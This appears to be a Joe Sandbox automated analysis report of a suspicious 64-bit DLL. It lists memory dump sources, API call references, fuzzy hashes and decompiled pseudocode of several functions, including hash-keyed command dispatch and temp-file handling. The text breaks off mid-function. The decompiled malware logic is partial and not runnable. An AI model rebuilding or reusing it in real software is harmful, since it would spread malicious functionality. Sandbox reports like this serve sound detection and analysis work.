Memory Dump Source

Source File: 00000000.00000002.264994836.000001FF41C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF41C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ff41c20000_loaddll64.jbxd

Similarity

API ID:
String ID: R
API String ID: 0-1466425173
Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction ID: 5568b5defde0d3f082349ed51791747750850e94639b96616ae01ff4a2a09641
Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction Fuzzy Hash: BF816B31B186468FE6A5DB18C954BFB76E1FF98300FB4547DA18AC33D1C6AC8C868742

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800025EC Relevance: 3.0, APIs: 2, Instructions: 14
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00000001800025F7
WaitForSingleObject.KERNEL32 ref: 0000000180002615

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ObjectSingleSleepWait
String ID:
API String ID: 309074506-0
Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700

Uniqueness

Uniqueness Score: -1.00%

Function 000001FF41C23880 Relevance: 1.7, APIs: 1, Instructions: 154
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 000001FF41C23A5F

Memory Dump Source

Source File: 00000000.00000002.264994836.000001FF41C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF41C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ff41c20000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction ID: ca1e9d5499abb0ef6ae7f196a200784a2e4b45087c3d3663fd45ddc9ded4c5f3
Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction Fuzzy Hash: B3510030F18646DFE7A5DB5889557FB76D1FF88300FA4293DA286C7390D2B888429783

Uniqueness

Uniqueness Score: -1.00%

Function 000001FF41C21C0B Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.264994836.000001FF41C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF41C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ff41c20000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction ID: 7ce3d945db2e74cd5f78d42d3e86f908fdbabf9c160391db11a0b8b6c0fdbb12
Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction Fuzzy Hash: 7A512334F1864A8FE6A7EB98C8547FB76E1FF84300FB4053DA246C3391D7A899429742

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180006344 Relevance: 31.7, APIs: 21, Instructions: 220
memorystringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397

Part of subcall function 00000001800066A8: Sleep.KERNEL32 ref: 00000001800066D2
Part of subcall function 00000001800066A8: GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800066DD
Part of subcall function 00000001800066A8: HeapAlloc.KERNEL32 ref: 00000001800066F1

lstrlenA.KERNEL32 ref: 00000001800063E6
lstrlenA.KERNEL32 ref: 00000001800063F2
HeapAlloc.KERNEL32 ref: 0000000180006405
lstrcpyA.KERNEL32 ref: 000000018000641D
lstrcatA.KERNEL32 ref: 0000000180006444
lstrcatA.KERNEL32 ref: 0000000180006450
lstrlenA.KERNEL32 ref: 0000000180006482
HeapAlloc.KERNEL32 ref: 000000018000649B
_snprintf.NTDLL ref: 000000018000650F
HeapFree.KERNEL32 ref: 000000018000651E
HeapAlloc.KERNEL32 ref: 0000000180006577
_snprintf.NTDLL ref: 00000001800065E5
_snprintf.NTDLL ref: 0000000180006614
HeapFree.KERNEL32 ref: 000000018000662C
HeapFree.KERNEL32 ref: 000000018000663C
HeapFree.KERNEL32 ref: 000000018000664A
HeapFree.KERNEL32 ref: 0000000180006658
HeapFree.KERNEL32 ref: 000000018000666B
HeapFree.KERNEL32 ref: 0000000180006679

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
String ID:
API String ID: 4119021385-0
Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008D78 Relevance: 24.2, APIs: 16, Instructions: 249
memorystringtimeCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* _t77;
				void* _t88;
				intOrPtr _t91;
				void* _t96;
				char _t97;
				void* _t115;
				long long* _t157;
				void* _t158;
				long long _t160;
				char* _t162;
				long long _t163;
				char* _t178;
				char* _t179;
				void* _t203;
				long long _t204;
				void* _t208;
				intOrPtr* _t209;
				int _t211;
				void* _t215;
				void* _t216;
				void* _t235;
				long _t238;
				long _t244;
				void* _t246;
				CHAR* _t253;
				long long _t254;

				_t235 = _t215;
				 *((long long*)(_t235 + 8)) = __rbx;
				 *((long long*)(_t235 + 0x10)) = __rdx;
				_t216 = _t215 - 0x40;
				r13d =  *0x8000d498;
				_t209 = __rcx;
				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
				_t157 =  *_t209;
				 *((long long*)(_t216 + 0x98)) = _t157;
				 *((long long*)(_t216 + 0x28)) = _t204;
				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
				r8d = lstrlenA(_t253) + 1;
				HeapAlloc(_t246, _t244, _t238);
				_t254 = _t157;
				if (_t157 == 0) goto 0x800090e4;
				memcpy(_t203, _t208, _t211);
				_t162 = _t254;
				if ( *_t162 == 0x20) goto 0x80008e46;
				if ( *_t162 != 9) goto 0x80008e4b;
				_t163 = _t162 + 1;
				goto 0x80008e3c;
				if ( *_t163 == 0) goto 0x80008ecc;
				lstrlenA(??);
				asm("cdq");
				_t12 = _t157 + 1; // 0x1
				r8d = _t12;
				HeapAlloc(??, ??, ??);
				if (_t157 == 0) goto 0x80008ece;
				_t96 =  *_t163;
				if (_t96 == 0) goto 0x80008e99;
				if (_t96 == 0x20) goto 0x80008e95;
				_t178 = _t163 + 1;
				_t97 =  *_t178;
				if (_t97 != 0) goto 0x80008e87;
				if (_t97 != 0) goto 0x80008e9b;
				if (_t178 == 0) goto 0x80008eb5;
				 *_t178 = 0;
				_t179 = _t178 + 1;
				if ( *_t179 == 0x20) goto 0x80008eb0;
				if ( *_t179 != 9) goto 0x80008eb5;
				goto 0x80008ea6;
				 *_t157 = _t163;
				_t158 = _t157 + _t204;
				if (_t179 + 1 != 0) goto 0x80008e7e;
				goto 0x80008ed6;
				if (0 == 0) goto 0x80008f4f;
				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
				 *((long long*)(_t209 + 0x40)) = _t254;
				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
				 *((char*)(_t209 + 0x70)) = 0;
				asm("lock and dword [esi+0x2c], 0xfffffffe");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80008f6a;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				if (0x57 != 0) goto 0x800090f3;
				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
				_t91 =  *((intOrPtr*)(_t216 + 0x98));
				if (_t77 != 0) goto 0x80008fd2;
				if (_t91 == 0) goto 0x800090ee;
				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
				_t39 = _t158 + 0x10; // 0x10
				_t88 = _t39;
				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
				E0000000118000958C( *_t209 + 0x18);
				r8d = _t115;
				memcpy(??, ??, ??);
				if (_t115 - _t88 >= 0) goto 0x80009043;
				r8d = _t88 - _t115;
				memset(??, ??, ??);
				LeaveCriticalSection(??);
				HeapFree(??, ??, ??);
				r13d = r13d ^ 0x1a1a0866;
				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
				_t55 =  *_t209 + 0x18; // 0x28
				E0000000118000958C(_t55);
				GetSystemTimeAsFileTime(??);
				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
				 *((long long*)(_t216 + 0x30)) = _t160;
				 *((long long*)(_t209 + 0x30)) = _t160;
				LeaveCriticalSection(??);
				goto 0x800090f3;
				goto 0x80008f6a;
				return 1;
			}

0x180008d78
0x180008d7b
0x180008d7f
0x180008d8e
0x180008d99
0x180008daa
0x180008dbe
0x180008dca
0x180008ddc
0x180008de0
0x180008de3
0x180008deb
0x180008df3
0x180008e09
0x180008e0e
0x180008e14
0x180008e1a
0x180008e29
0x180008e35
0x180008e3f
0x180008e44
0x180008e46
0x180008e49
0x180008e4e
0x180008e53
0x180008e5c
0x180008e63
0x180008e63
0x180008e6b
0x180008e79
0x180008e7e
0x180008e85
0x180008e8a
0x180008e8c
0x180008e8f
0x180008e93
0x180008e97
0x180008e9e
0x180008ea0
0x180008ea3
0x180008ea9
0x180008eae
0x180008eb3
0x180008eb5
0x180008eba
0x180008ec3
0x180008eca
0x180008ed8
0x180008ee6
0x180008ef3
0x180008ef7
0x180008efb
0x180008f03
0x180008f05
0x180008f09
0x180008f12
0x180008f1b
0x180008f2a
0x180008f38
0x180008f4d
0x180008f57
0x180008f77
0x180008f7f
0x180008fa5
0x180008fba
0x180008fbf
0x180008fc8
0x180008fcc
0x180008fd5
0x180008ff5
0x180008ffa
0x180008ffa
0x18000900b
0x180009013
0x180009021
0x180009026
0x18000902d
0x18000903b
0x18000903e
0x180009048
0x180009058
0x18000905e
0x180009081
0x180009099
0x1800090a4
0x1800090a9
0x1800090ad
0x1800090b7
0x1800090cc
0x1800090d3
0x1800090d8
0x1800090dc
0x1800090e2
0x1800090e9
0x18000910c

APIs

lstrlenA.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008DFC
HeapAlloc.KERNEL32 ref: 0000000180008E0E
memcpy.NTDLL ref: 0000000180008E29
lstrlenA.KERNEL32 ref: 0000000180008E53
HeapAlloc.KERNEL32 ref: 0000000180008E6B
LeaveCriticalSection.KERNEL32 ref: 0000000180008F12
HeapFree.KERNEL32 ref: 0000000180008F2A
HeapFree.KERNEL32 ref: 0000000180008F38
HeapFree.KERNEL32 ref: 0000000180008F57
HeapFree.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008F77
memcpy.NTDLL ref: 0000000180009026
memset.NTDLL ref: 000000018000903E
LeaveCriticalSection.KERNEL32 ref: 0000000180009048
HeapFree.KERNEL32 ref: 0000000180009058
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800090B7
LeaveCriticalSection.KERNEL32 ref: 00000001800090DC

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
String ID:
API String ID: 3273538229-0
Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001844 Relevance: 19.7, APIs: 13, Instructions: 167
memoryfilestringCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
				signed long long _v72;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t27;
				int _t34;
				void* _t36;
				int _t53;
				int _t61;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t92;
				signed long long _t93;
				intOrPtr* _t106;
				void* _t118;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				void* _t125;
				signed long long _t132;
				void* _t140;
				void* _t145;

				_t94 = __rbx;
				_a8 = __rbx;
				_t92 =  *0x8000d4a0;
				r12d = 0;
				_t145 = __rcx;
				if (__rdx == _t140) goto 0x80001a6f;
				if ( *__rdx == r12b) goto 0x80001a6f;
				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
				if (_t92 == _t140) goto 0x80001a6a;
				_t93 =  *0x8000d4a0;
				_t27 = GetTempPathW(??, ??);
				if (_t27 == r12d) goto 0x80001a55;
				HeapAlloc(??, ??, ??);
				if (_t93 == _t140) goto 0x80001a55;
				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
				GetSystemTimeAsFileTime(??);
				r8d = GetCurrentThreadId() ^ _a32;
				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
				_t132 = _t93;
				HeapFree(??, ??, ??);
				if (_t140 == _t140) goto 0x80001a55;
				_t122 = _t92;
				__imp__StrChrW();
				r8d = 0;
				if (_t93 == _t132) goto 0x80001964;
				_a16 = _t27;
				goto 0x80001976;
				_t106 = _t122;
				_t34 = lstrlenW(??);
				r8d = 0;
				_a16 = _t34;
				if (_t34 == r8d) goto 0x800019a7;
				_t11 = _t106 - 1; // -1
				_t61 = _t11;
				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
				if (_t68 == 0x20) goto 0x8000198e;
				if (_t68 != 9) goto 0x80001999;
				_t53 = _t61;
				_a16 = _t61;
				if (_t61 != r8d) goto 0x8000197b;
				if (_t53 == r8d) goto 0x800019a7;
				_t69 =  *_t122;
				if (_t69 == 0x20) goto 0x800019ad;
				if (_t69 != 9) goto 0x800019b9;
				_t123 = _t122 + 2;
				_a16 = _t53 - 1;
				goto 0x80001999;
				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
				if ( *_t123 == r8w) goto 0x800019ef;
				_v72 = _t132;
				r9d = 0;
				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
				if (_t36 != 0) goto 0x80001a3c;
				if (_t93 + 2 == 0) goto 0x800019f4;
				goto 0x80001938;
				if (_t36 != r8d) goto 0x80001a3c;
				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
				r9d = _a16;
				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
				HeapFree(??, ??, ??);
				DeleteFileW(??);
				HeapFree(??, ??, ??);
				goto 0x80001a5a;
				HeapFree(??, ??, ??);
				goto 0x80001a6f;
				return 8;
			}

0x180001844
0x180001844
0x180001858
0x18000185f
0x180001869
0x180001874
0x18000187d
0x180001888
0x180001893
0x180001899
0x1800018a8
0x1800018b3
0x1800018c3
0x1800018cf
0x1800018e3
0x1800018ed
0x180001908
0x180001914
0x180001916
0x18000191e
0x18000192a
0x180001935
0x180001940
0x180001946
0x18000194f
0x18000195e
0x180001962
0x180001964
0x180001967
0x18000196d
0x180001972
0x180001979
0x18000197b
0x18000197b
0x18000197e
0x180001986
0x18000198c
0x18000198e
0x180001990
0x180001997
0x18000199c
0x18000199e
0x1800019a5
0x1800019ab
0x1800019ad
0x1800019b3
0x1800019b7
0x1800019bb
0x1800019c4
0x1800019c6
0x1800019cb
0x1800019d7
0x1800019e0
0x1800019e8
0x1800019ea
0x1800019f2
0x180001a0d
0x180001a0f
0x180001a22
0x180001a36
0x180001a3f
0x180001a4d
0x180001a53
0x180001a62
0x180001a68
0x180001a85

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

GetTempPathW.KERNEL32 ref: 00000001800018A8
HeapAlloc.KERNEL32 ref: 00000001800018C3
GetTempPathW.KERNEL32 ref: 00000001800018DA
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800018ED
GetCurrentThreadId.KERNEL32 ref: 00000001800018F3
GetTempFileNameW.KERNEL32 ref: 000000018000190B
HeapFree.KERNEL32 ref: 000000018000191E
StrChrW.SHLWAPI ref: 0000000180001940
lstrlenW.KERNEL32 ref: 0000000180001967
HeapFree.KERNEL32 ref: 0000000180001A36
DeleteFileW.KERNEL32 ref: 0000000180001A3F
HeapFree.KERNEL32 ref: 0000000180001A4D
HeapFree.KERNEL32 ref: 0000000180001A62

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
String ID:
API String ID: 2968359827-0
Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184
memorysynchronizationCOMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				signed int _t35;
				void* _t69;
				void* _t80;
				char* _t113;
				signed long long _t116;
				char* _t124;
				void* _t142;
				void* _t145;
				char* _t147;
				signed long long _t150;
				void* _t152;
				void* _t153;
				long _t169;
				void* _t170;
				void* _t172;
				void* _t175;

				_t116 = __rbx;
				 *((long long*)(_t152 + 8)) = __rbx;
				 *(_t152 + 0x18) = _t150;
				_t153 = _t152 - 0x40;
				_t113 =  *0x8000d4a0;
				r15d =  *0x8000d498;
				_t35 = r15d ^ __edx;
				_t146 = __r8;
				_t170 = __rcx;
				_t4 = _t150 + 1; // 0x1
				_t80 = _t4;
				if (_t35 == 0x139d2b8d) goto 0x8000588d;
				if (_t35 == 0x15f5a8c2) goto 0x80005865;
				if (_t35 == 0x2f77acf9) goto 0x8000588b;
				if (_t35 == 0x31f2972e) goto 0x80005861;
				if (_t35 == 0x48e12436) goto 0x80005965;
				if (_t35 == 0x4d382929) goto 0x80005905;
				if (_t35 == 0x7f513d6b) goto 0x80005863;
				if (_t35 == 0xb016dc39) goto 0x80005852;
				if (_t35 == 0xb057dfc9) goto 0x800057e4;
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
				if (_t113 == 0) goto 0x8000583e;
				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
				goto 0x800059bb;
				HeapFree(_t172, _t169, _t142);
				goto 0x800059bb;
				goto 0x800059bb;
				goto 0x800059bb;
				SetEvent(_t145);
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				_t124 = _t113;
				E000000011800024CC(r9d, _t116, _t124, _t146);
				_t147 = _t113;
				if (_t113 == 0) goto 0x8000583e;
				if (_t80 + _t80 != 2) goto 0x800058ae;
				goto 0x800058c2;
				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
				WaitForSingleObject(??, ??);
				asm("sbb ebx, ebx");
				goto 0x800058f1;
				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
				goto 0x8000582e;
				if (_t80 == 0) goto 0x800059bb;
				if (0x426 != 0x426) goto 0x800059bb;
				if (_t147 == 0) goto 0x8000595f;
				if ( *_t147 == 0) goto 0x8000595f;
				memset(??, ??, ??);
				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
				asm("ror ax, 0x8");
				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
				if (0 != 0) goto 0x800059bb;
				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
				HeapFree(??, ??, ??);
				goto 0x8000599f;
				if (_t80 == 0) goto 0x800059bb;
				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
				if (_t69 == 0x3e5) goto 0x800059e1;
				r8d = _t69;
				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
				return _t69;
			}

0x180005748
0x180005748
0x18000574d
0x18000575a
0x18000575e
0x180005765
0x180005777
0x180005779
0x18000577c
0x18000577f
0x18000577f
0x180005787
0x180005792
0x18000579d
0x1800057a8
0x1800057b3
0x1800057be
0x1800057c9
0x1800057d4
0x1800057db
0x1800057df
0x1800057e7
0x1800057ef
0x1800057fa
0x180005804
0x18000581f
0x180005826
0x180005833
0x180005839
0x180005843
0x18000584d
0x180005856
0x18000585c
0x180005868
0x18000586d
0x180005870
0x180005875
0x18000587b
0x180005880
0x180005889
0x180005894
0x18000589c
0x1800058a4
0x1800058ac
0x1800058be
0x1800058ca
0x1800058de
0x1800058e7
0x1800058f3
0x1800058ff
0x18000590d
0x180005912
0x180005926
0x18000593a
0x18000594d
0x180005954
0x180005958
0x180005963
0x18000596d
0x180005976
0x180005983
0x180005990
0x180005998
0x1800059a1
0x1800059b9
0x1800059c4
0x1800059cc
0x1800059d6
0x1800059dc
0x1800059fb

APIs

HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990

Strings

6$H, xrefs: 00000001800057AE
lJu, xrefs: 0000000180005914
))8M, xrefs: 00000001800057B9

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: FreeHeap$EventObjectSingleWaitmemset
String ID: ))8M$6$H$lJu
API String ID: 2222956709-2816507560
Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004A14 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 24%

			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
				void* _v40;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v104;
				intOrPtr _v120;
				long long _v128;
				long long _v136;
				char _t57;
				intOrPtr _t95;
				void* _t96;
				long long* _t114;
				long long* _t115;

				_t114 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t141 =  *0x8000d4a0;
				r14d = __ecx;
				_t95 = r8d;
